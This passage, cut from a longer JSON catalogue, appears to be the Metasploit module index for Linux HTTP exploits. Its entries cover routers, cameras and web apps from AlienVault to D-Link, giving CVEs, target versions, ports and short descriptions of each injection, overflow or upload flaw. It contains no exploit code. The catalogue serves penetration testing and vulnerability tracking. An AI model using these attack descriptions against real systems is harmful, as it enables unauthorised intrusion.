"notes": {
}
},
"exploit_linux/http/alienvault_sqli_exec": {
"name": "AlienVault OSSIM SQL Injection and Remote Code Execution",
"full_name": "exploit/linux/http/alienvault_sqli_exec",
"rank": 600,
"disclosure_date": "2014-04-24",
"type": "exploit",
"author": [
"Sasha Zivojinovic",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits an unauthenticated SQL injection vulnerability affecting AlienVault\n OSSIM versions 4.3.1 and lower. The SQL injection issue can be abused in order to retrieve an\n active admin session ID. If an administrator level user is identified, remote code execution\n can be gained by creating a high priority policy with an action containing our payload.",
"references": [
"CVE-2016-8581",
"OSVDB-106252",
"EDB-33006"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Alienvault OSSIM 4.3"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/alienvault_sqli_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/alienvault_sqli_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/apache_continuum_cmd_exec": {
"name": "Apache Continuum Arbitrary Command Execution",
"full_name": "exploit/linux/http/apache_continuum_cmd_exec",
"rank": 600,
"disclosure_date": "2016-04-06",
"type": "exploit",
"author": [
"David Shanahan",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a command injection in Apache Continuum <= 1.4.2.\n By injecting a command into the installation.varValue POST parameter to\n /continuum/saveInstallation.action, a shell can be spawned.",
"references": [
"EDB-39886"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Apache Continuum <= 1.4.2"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/linux/http/apache_continuum_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/apache_continuum_cmd_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/apache_couchdb_cmd_exec": {
"name": "Apache CouchDB Arbitrary Command Execution",
"full_name": "exploit/linux/http/apache_couchdb_cmd_exec",
"rank": 600,
"disclosure_date": "2016-04-06",
"type": "exploit",
"author": [
"Max Justicz",
"Joan Touzet",
"Green-m <greenm.xxoo@gmail.com>"
],
"description": "CouchDB administrative users can configure the database server via HTTP(S).\n Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.\n This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,\n including downloading and executing scripts from the public internet.",
"references": [
"CVE-2017-12636",
"CVE-2017-12635",
"URL-https://justi.cz/security/2017/11/14/couchdb-rce-npm.html",
"URL-http://docs.couchdb.org/en/latest/cve/2017-12636.html",
"URL-https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 5984,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Apache CouchDB version 1.x",
"Apache CouchDB version 2.x"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/linux/http/apache_couchdb_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/apache_couchdb_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/astium_sqli_upload": {
"name": "Astium Remote Code Execution",
"full_name": "exploit/linux/http/astium_sqli_upload",
"rank": 0,
"disclosure_date": "2013-09-17",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits vulnerabilities found in Astium astium-confweb-2.1-25399 RPM and\n lower. A SQL Injection vulnerability is used to achieve authentication bypass and gain\n admin access. From an admin session arbitrary PHP code upload is possible. It is used\n to add the final PHP payload to \"/usr/local/astium/web/php/config.php\" and execute the\n \"sudo /sbin/service astcfgd reload\" command to reload the configuration and achieve\n remote root code execution.",
"references": [
"OSVDB-88860",
"EDB-23831"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Astium 2.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/astium_sqli_upload.rb",
"is_install_path": true,
"ref_name": "linux/http/astium_sqli_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/asuswrt_lan_rce": {
"name": "AsusWRT LAN Unauthenticated Remote Code Execution",
"full_name": "exploit/linux/http/asuswrt_lan_rce",
"rank": 600,
"disclosure_date": "2018-01-22",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to\n perform a POST in certain cases. This can be combined with another vulnerability in\n the VPN configuration upload routine that sets NVRAM configuration variables directly\n from the POST request to enable a special command mode.\n This command mode can then be abused by sending a UDP packet to infosvr, which is running\n on UDP port 9999, to directly execute commands as root.\n This exploit leverages that to start telnetd on a random port, and then connects to it.\n It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.",
"references": [
"URL-https://blogs.securiteam.com/index.php/archives/3589",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt",
"URL-https://seclists.org/fulldisclosure/2018/Jan/78",
"CVE-2018-5999",
"CVE-2018-6000"
],
"platform": "Unix",
"arch": "cmd",
"rport": 9999,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"AsusWRT < v3.0.0.4.384.10007"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/asuswrt_lan_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/asuswrt_lan_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/atutor_filemanager_traversal": {
"name": "ATutor 2.2.1 Directory Traversal / Remote Code Execution",
"full_name": "exploit/linux/http/atutor_filemanager_traversal",
"rank": 600,
"disclosure_date": "2016-03-01",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in ATutor on an Apache/PHP\n setup with display_errors set to On, which can be used to allow us to upload a malicious\n ZIP file. On the web application, a blacklist verification is performed before extraction,\n however it is not sufficient to prevent exploitation.\n\n You are required to login to the target to reach the vulnerability, however this can be\n done as a student account and remote registration is enabled by default.\n\n Just in case remote registration isn't enabled, this module uses 2 vulnerabilities\n in order to bypass the authentication:\n\n 1. confirm.php Authentication Bypass Type Juggling vulnerability\n 2. password_reminder.php Remote Password Reset TOCTOU vulnerability",
"references": [
"URL-http://www.atutor.ca/",
"URL-http://sourceincite.com/research/src-2016-09/",
"URL-http://sourceincite.com/research/src-2016-10/",
"URL-http://sourceincite.com/research/src-2016-11/",
"URL-https://github.com/atutor/ATutor/pull/107"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/linux/http/atutor_filemanager_traversal.rb",
"is_install_path": true,
"ref_name": "linux/http/atutor_filemanager_traversal",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/axis_srv_parhand_rce": {
"name": "Axis Network Camera .srv to parhand RCE",
"full_name": "exploit/linux/http/axis_srv_parhand_rce",
"rank": 600,
"disclosure_date": "2018-06-18",
"type": "exploit",
"author": [
"Or Peles",
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"Brent Cook",
"Jacob Robles",
"Matthew Kienow",
"Shelby Pace",
"Chris Lee",
"Cale Black"
],
"description": "This module exploits an auth bypass in .srv functionality and a\n command injection in parhand to execute code as the root user.",
"references": [
"CVE-2018-10660",
"CVE-2018-10661",
"CVE-2018-10662",
"URL-https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/",
"URL-https://www.axis.com/files/faq/Advisory_ACV-128401.pdf"
],
"platform": "Linux,Unix",
"arch": "cmd, armle",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix In-Memory",
"Linux Dropper"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/linux/http/axis_srv_parhand_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/axis_srv_parhand_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/belkin_login_bof": {
"name": "Belkin Play N750 login.cgi Buffer Overflow",
"full_name": "exploit/linux/http/belkin_login_bof",
"rank": 300,
"disclosure_date": "2014-05-09",
"type": "exploit",
"author": [
"Marco Vaz <mv@integrity.pt>",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a remote buffer overflow vulnerability on Belkin Play N750 DB\n Wireless Dual-Band N+ Router N750 routers. The vulnerability exists in the handling\n of HTTP queries with long 'jump' parameters addressed to the /login.cgi URL, allowing\n remote unauthenticated attackers to execute arbitrary code. This module was tested in\n an emulated environment, using the version 1.10.16.m of the firmware.",
"references": [
"CVE-2014-1635",
"EDB-35184",
"BID-70977",
"OSVDB-114345",
"URL-https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/",
"URL-http://www.belkin.com/us/support-article?articleNum=4831"
],
"platform": "Linux",
"arch": "mipsle",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Belkin Play N750 DB Wireless Dual-Band N+ Router, F9K1103, firmware 1.10.16.m"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/belkin_login_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/belkin_login_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/centreon_sqli_exec": {
"name": "Centreon SQL and Command Injection",
"full_name": "exploit/linux/http/centreon_sqli_exec",
"rank": 600,
"disclosure_date": "2014-10-15",
"type": "exploit",
"author": [
"MaZ",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon\n Enterprise Server 2.2 and prior. Due to a combination of SQL injection and command\n injection in the displayServiceStatus.php component, it is possible to execute arbitrary\n commands as long as there is a valid session registered in the centreon.session table.\n In order to have a valid session, all it takes is a successful login from anybody.\n The exploit itself does not require any authentication.\n\n This module has been tested successfully on Centreon Enterprise Server 2.2.",
"references": [
"CVE-2014-3828",
"CVE-2014-3829",
"US-CERT-VU-298796",
"URL-https://seclists.org/fulldisclosure/2014/Oct/78"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Centreon Enterprise Server 2.2"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/centreon_sqli_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/centreon_sqli_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/centreon_useralias_exec": {
"name": "Centreon Web Useralias Command Execution",
"full_name": "exploit/linux/http/centreon_useralias_exec",
"rank": 600,
"disclosure_date": "2016-02-26",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"Nicolas CHATELAIN <n.chatelain@sysdream.com>"
],
"description": "Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL\n errors. This functionality can be abused for arbitrary code\n execution, and can be triggered via the login screen prior to\n authentication.",
"references": [
"EDB-39501"
],
"platform": "Python",
"arch": "python",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/centreon_useralias_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/centreon_useralias_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/cfme_manageiq_evm_upload_exec": {
"name": "Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal",
"full_name": "exploit/linux/http/cfme_manageiq_evm_upload_exec",
"rank": 600,
"disclosure_date": "2013-09-04",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "This module exploits a path traversal vulnerability in the \"linuxpkgs\"\n action of the \"agent\" controller of the Red Hat CloudForms Management Engine 5.1\n (ManageIQ Enterprise Virtualization Manager 5.0 and earlier).\n It uploads a fake controller to the controllers directory of the Rails\n application with the encoded payload as an action and sends a request to\n this action to execute the payload. Optionally, it can also upload a routing\n file containing a route to the action. (This is not necessary, since the\n application already contains a general default route.)",
"references": [
"CVE-2013-2068",
"CWE-22",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=960422"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/cfme_manageiq_evm_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/cisco_firepower_useradd": {
"name": "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability",
"full_name": "exploit/linux/http/cisco_firepower_useradd",
"rank": 600,
"disclosure_date": "2016-10-10",
"type": "exploit",
"author": [
"Matt",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Cisco Firepower Management Console.\n The management system contains a configuration flaw that allows the www user to\n execute the useradd binary, which can be abused to create backdoor accounts.\n Authentication is required to exploit this vulnerability.",
"references": [
"CVE-2016-6433",
"URL-https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking"
],
"platform": "Linux",
"arch": "x86",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Cisco Firepower Management Console 6.0.1 (build 1213)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/cisco_firepower_useradd.rb",
"is_install_path": true,
"ref_name": "linux/http/cisco_firepower_useradd",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/cisco_prime_inf_rce": {
"name": "Cisco Prime Infrastructure Unauthenticated Remote Code Execution",
"full_name": "exploit/linux/http/cisco_prime_inf_rce",
"rank": 600,
"disclosure_date": "2018-10-04",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "Cisco Prime Infrastructure (CPI) contains two basic flaws that when exploited allow\n an unauthenticated attacker to achieve remote code execution. The first flaw is a file\n upload vulnerability that allows the attacker to upload and execute files as the Apache\n Tomcat user; the second is a privilege escalation to root by bypassing execution restrictions\n in a SUID binary.\n\n This module exploits these vulnerabilities to achieve unauthenticated remote code execution\n as root on the CPI default installation.\n\n This module has been tested with CPI 3.2.0.0.258 and 3.4.0.0.348. Earlier and later versions\n might also be affected, although 3.4.0.0.348 is the latest at the time of writing.\n The file upload vulnerability should have been fixed in versions 3.4.1 and 3.3.1 Update 02.",
"references": [
"CVE-2018-15379",
"URL-https://seclists.org/fulldisclosure/2018/Oct/19",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-prime-infrastructure.txt",
"URL-https://blogs.securiteam.com/index.php/archives/3723",
"URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Cisco Prime Infrastructure < 3.4.1 & 3.3.1 Update 02"
],
"mod_time": "2018-11-05 00:52:34 +0000",
"path": "/modules/exploits/linux/http/cisco_prime_inf_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/cisco_prime_inf_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/cisco_rv130_rmi_rce": {
"name": "Cisco RV130W Routers Management Interface Remote Command Execution",
"full_name": "exploit/linux/http/cisco_rv130_rmi_rce",
"rank": 400,
"disclosure_date": "2019-02-27",
"type": "exploit",
"author": [
"Yu Zhang",
"Haoliang Lu",
"T. Shiomitsu",
"Quentin Kaiser <kaiserquentin@gmail.com>"
],
"description": "A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router\n could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.\n\n The vulnerability is due to improper validation of user-supplied data in the web-based management interface.\n An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.\n\n A successful exploit could allow the attacker to execute arbitrary code on the underlying operating\n system of the affected device as a high-privilege user.\n\n RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.\n\n Note: successful exploitation may not result in a session, and as such,\n on_new_session will never repair the HTTP server, leading to a denial-of-service condition.",
"references": [
"CVE-2019-1663",
"BID-107185",
"URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex"
],
"platform": "Linux",
"arch": "armle",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Cisco RV130/RV130W < 1.0.3.45"
],
"mod_time": "2019-04-12 14:23:57 +0000",
"path": "/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/cisco_rv130_rmi_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-down"
]
}
},
"exploit_linux/http/cisco_rv32x_rce": {
"name": "Cisco RV320 and RV325 Unauthenticated Remote Code Execution",
"full_name": "exploit/linux/http/cisco_rv32x_rce",
"rank": 300,
"disclosure_date": "2018-09-09",
"type": "exploit",
"author": [
"RedTeam Pentesting GmbH",
"Philip Huppert",
"Benjamin Grap"
],
"description": "This exploit module combines an information disclosure (CVE-2019-1653)\n and a command injection vulnerability (CVE-2019-1652) together to gain\n unauthenticated remote code execution on Cisco RV320 and RV325 small business\n routers. It can be exploited via the WAN interface of the router, either via HTTPS\n on port 443 or via HTTP on port 8007 on some older firmware versions.",
"references": [
"CVE-2019-1653",
"CVE-2019-1652",
"EDB-46243",
"BID-106728",
"BID-106732",
"URL-https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export",
"URL-https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection"
],
"platform": "Linux",
"arch": "",
"rport": 8007,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"LINUX MIPS64"
],
"mod_time": "2019-03-20 14:21:40 +0000",
"path": "/modules/exploits/linux/http/cisco_rv32x_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/cisco_rv32x_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/crypttech_cryptolog_login_exec": {
"name": "Crypttech CryptoLog Remote Code Execution",
"full_name": "exploit/linux/http/crypttech_cryptolog_login_exec",
"rank": 600,
"disclosure_date": "2017-05-03",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a SQL injection and command injection vulnerability in the PHP version of CryptoLog.\n An unauthenticated user can execute a terminal command under the context of the web user. These vulnerabilities\n are no longer present in the ASP.NET version of CryptoLog, available since 2009.\n\n CryptoLog's login.php endpoint is responsible for the login process. One of the user supplied parameters is\n used by the application without input validation and parameter binding, which leads to a SQL injection\n vulnerability. Successfully exploiting this vulnerability gives a valid session.\n\n CryptoLog's logshares_ajax.php endpoint is responsible for executing an operating system command. It's not\n possible to access this endpoint without having a valid session. One user parameter is used by the\n application while executing an operating system command, which causes a command injection issue.\n\n Combining these vulnerabilities gives the opportunity to execute operating system commands under the context\n of the web user.",
"references": [
"URL-https://pentest.blog/advisory-cryptolog-unauthenticated-remote-code-execution/"
],
"platform": "Python",
"arch": "python",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/crypttech_cryptolog_login_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dcos_marathon": {
"name": "DC/OS Marathon UI Docker Exploit",
"full_name": "exploit/linux/http/dcos_marathon",
"rank": 600,
"disclosure_date": "2017-03-03",
"type": "exploit",
"author": [
"Erik Daguerre"
],
"description": "Utilizing the DCOS Cluster's Marathon UI, an attacker can create\n a docker container with the '/' path mounted with read/write\n permissions on the host server that is running the docker container.\n As the docker container executes commands as uid 0, they are honored\n by the host operating system, allowing the attacker to edit/create\n files owned by root. This exploit abuses this to create a cron job\n in the '/etc/cron.d/' path of the host server.\n\n *Notes: The docker image must be a valid docker image from\n hub.docker.com. Furthermore the docker container will only\n deploy if there are resources available in the DC/OS cluster.",
"references": [
"URL-https://warroom.securestate.com/dcos-marathon-compromise/"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Python"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/dcos_marathon.rb",
"is_install_path": true,
"ref_name": "linux/http/dcos_marathon",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/ddwrt_cgibin_exec": {
"name": "DD-WRT HTTP Daemon Arbitrary Command Execution",
"full_name": "exploit/linux/http/ddwrt_cgibin_exec",
"rank": 600,
"disclosure_date": "2009-07-20",
"type": "exploit",
"author": [
"gat3way",
"hdm <x@hdm.io>"
],
"description": "This module abuses a metacharacter injection vulnerability in the\n HTTP management server of wireless gateways running DD-WRT. This flaw\n allows an unauthenticated attacker to execute arbitrary commands as\n the root user account.",
"references": [
"CVE-2009-2765",
"OSVDB-55990",
"BID-35742",
"EDB-9209"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/ddwrt_cgibin_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/ddwrt_cgibin_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/denyall_waf_exec": {
"name": "DenyAll Web Application Firewall Remote Code Execution",
"full_name": "exploit/linux/http/denyall_waf_exec",
"rank": 600,
"disclosure_date": "2017-09-19",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a\n terminal command under the context of the web server user.",
"references": [
"CVE-2017-14706",
"URL-https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/",
"URL-https://www.denyall.com/blog/advisories/advisory-unauthenticated-remote-code-execution-denyall-web-application-firewall/"
],
"platform": "Python",
"arch": "python",
"rport": 3001,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-10-04 12:11:58 +0000",
"path": "/modules/exploits/linux/http/denyall_waf_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/denyall_waf_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_authentication_cgi_bof": {
"name": "D-Link authentication.cgi Buffer Overflow",
"full_name": "exploit/linux/http/dlink_authentication_cgi_bof",
"rank": 300,
"disclosure_date": "2013-02-08",
"type": "exploit",
"author": [
"Roberto Paleari",
"Craig Heffner",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a remote buffer overflow vulnerability on several D-Link routers.\n The vulnerability exists in the handling of HTTP queries to the authentication.cgi with\n long password values. The vulnerability can be exploitable without authentication. This\n module has been tested successfully on D-Link firmware DIR645A1_FW103B11. Other firmwares\n such as the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable.",
"references": [
"OSVDB-95951",
"EDB-27283",
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008",
"URL-http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000",
"URL-http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt"
],
"platform": "Linux",
"arch": "mipsle",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"D-Link DIR-645 1.03"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_authentication_cgi_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_command_php_exec_noauth": {
"name": "D-Link Devices Unauthenticated Remote Command Execution",
"full_name": "exploit/linux/http/dlink_command_php_exec_noauth",
"rank": 600,
"disclosure_date": "2013-02-04",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Various D-Link Routers are vulnerable to OS command injection via the web\n interface. The vulnerability exists in command.php, which is accessible without\n authentication. This module has been tested with the versions DIR-600 2.14b01,\n DIR-300 rev B 2.13.",
"references": [
"OSVDB-89861",
"EDB-24453",
"BID-57734",
"URL-http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router",
"URL-http://www.s3cur1ty.de/home-network-horror-days",
"URL-http://www.s3cur1ty.de/m1adv2013-003"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_command_php_exec_noauth",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_dcs931l_upload": {
"name": "D-Link DCS-931L File Upload",
"full_name": "exploit/linux/http/dlink_dcs931l_upload",
"rank": 500,
"disclosure_date": "2015-02-23",
"type": "exploit",
"author": [
"Mike Baucom",
"Allen Harper",
"J. Rach",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in D-Link DCS-931L\n network cameras. The setFileUpload functionality allows authenticated\n users to upload files to anywhere on the file system, allowing system\n files to be overwritten, resulting in execution of arbitrary commands.\n This module has been tested successfully on a D-Link DCS-931L with\n firmware versions 1.01_B7 (2013-04-19) and 1.04_B1 (2014-04-21).\n D-Link DCS-930L, DCS-932L, DCS-933L models are also reportedly\n affected, but untested.",
"references": [
"CVE-2015-2049",
"URL-https://tangiblesecurity.com/index.php/announcements/tangible-security-researchers-notified-and-assisted-d-link-with-fixing-critical-device-vulnerabilities",
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10049"
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux mipsle Payload"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/http/dlink_dcs931l_upload.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dcs931l_upload",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/dlink_dcs_930l_authenticated_remote_command_execution": {
"name": "D-Link DCS-930L Authenticated Remote Command Execution",
"full_name": "exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution",
"rank": 600,
"disclosure_date": "2015-12-20",
"type": "exploit",
"author": [
"Nicholas Starke <nick@alephvoid.com>"
],
